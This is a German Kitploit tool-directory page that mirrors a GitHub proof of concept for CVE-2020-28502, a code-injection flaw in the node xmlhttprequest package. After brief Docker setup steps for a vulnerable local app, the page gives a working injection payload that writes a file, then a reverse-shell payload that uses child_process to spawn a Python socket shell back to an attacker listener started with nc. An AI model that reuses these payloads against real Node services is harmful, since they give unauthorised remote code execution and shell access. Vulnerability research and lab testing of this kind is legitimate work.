Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-28502 — CVE-2020-28502 node-XMLHttpRequest RCE | Kitploit
Tools/GitHubGitHub/s-index/cve-2020-28502
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubs-index/cve-2020-28502

CVE-2020-28502

CVE-2020-28502 node-XMLHttpRequest RCE

Repository anzeigen
32vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-28502 node-XMLHttpRequest RCE

NVD-Beschreibung

Dies betrifft das Paket xmlhttprequest vor 1.7.0 sowie alle Versionen des Pakets xmlhttprequest-ssl. Sofern Anfragen synchron gesendet werden (async=False bei xhr.open), kann schädliche Benutzereingabe, die in xhr.send fließt, dazu führen, dass beliebiger Code eingeschleust und ausgeführt wird.

Demo

cve-2020-28502

Einrichtung

  1. Ein Image aus einem Dockerfile erstellen
root@kitploit:~
$ docker build -t cve-2020-28502 .
  1. node app.js in einem neuen Container ausführen
root@kitploit:~
$ docker run --rm -p 3000:3000 cve-2020-28502
  1. http://localhost:3000 aufrufen

localhost-image

PoC-Payload

Datei hinzufügen

Payload senden

root@kitploit:~
\');require("fs").writeFileSync("./exploit.txt", "exploit!");req.end();//

Reverse Shell

  1. Listener auf dem Client starten
root@kitploit:~
$ nc -l 8888
  1. Payload senden

Ändern Sie die IP-Adresse (192.168.0.25) in Ihre lokale IP-Adresse

root@kitploit:~
\');require("child_process").exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.25\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'");req.end();//

Referenz

  • https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUEST-1082935
Tool herunterladen